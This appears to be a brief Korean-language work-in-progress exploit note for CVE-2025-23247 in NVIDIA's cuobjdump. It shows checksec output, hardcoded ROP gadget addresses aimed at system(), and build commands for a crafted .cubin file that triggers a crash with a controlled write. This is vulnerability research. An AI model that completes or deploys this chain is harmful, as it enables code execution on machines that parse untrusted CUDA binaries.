
CVE-2025-23247에 대한 작업 진행 중. 현재는 버퍼와 오프셋을 제어할 수 있음을 보여주는 크래시 PoC만 있으며, 그래서 aaw(임의 주소 쓰기)를 확보했다.
@reubensammut와 함께하는 대박 콜라보 :) 언제나 그렇듯 :) CVE-2025-23247에 대한 WIP입니다. 현재는 그냥 크래시 PoC로, 버퍼와 오프셋을 제어할 수 있음을 보여주므로 aaw를 확보했습니다. 버그 출처: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151
checksec ./cuobjdump [*] '/home/vlad/cuobjdump' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
어쨌든 PIE가 없으므로
uint64_t system_plt = 0x401d90; uint64_t pop_rdi_ret = 0x402d1b; uint64_t ret_gadget = 0x402d1c; // Just a ret
크래시 지점

gcc -o modify_simple modify_simple.c vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin 취약한 .nv_debug_source 섹션이 있는 modified_simple2.cubin 생성됨 실행: ./cuobjdump --dump-elf modified_simple2.cubin
그리고 cuda 커널의 경우
nvcc -ptx simple.cu -o simple.ptx nvcc -cubin simple.ptx -o simple.cubin --generate-line-info 또는 nvcc -cubin simple.cu -o simple.cubin --generate-line-info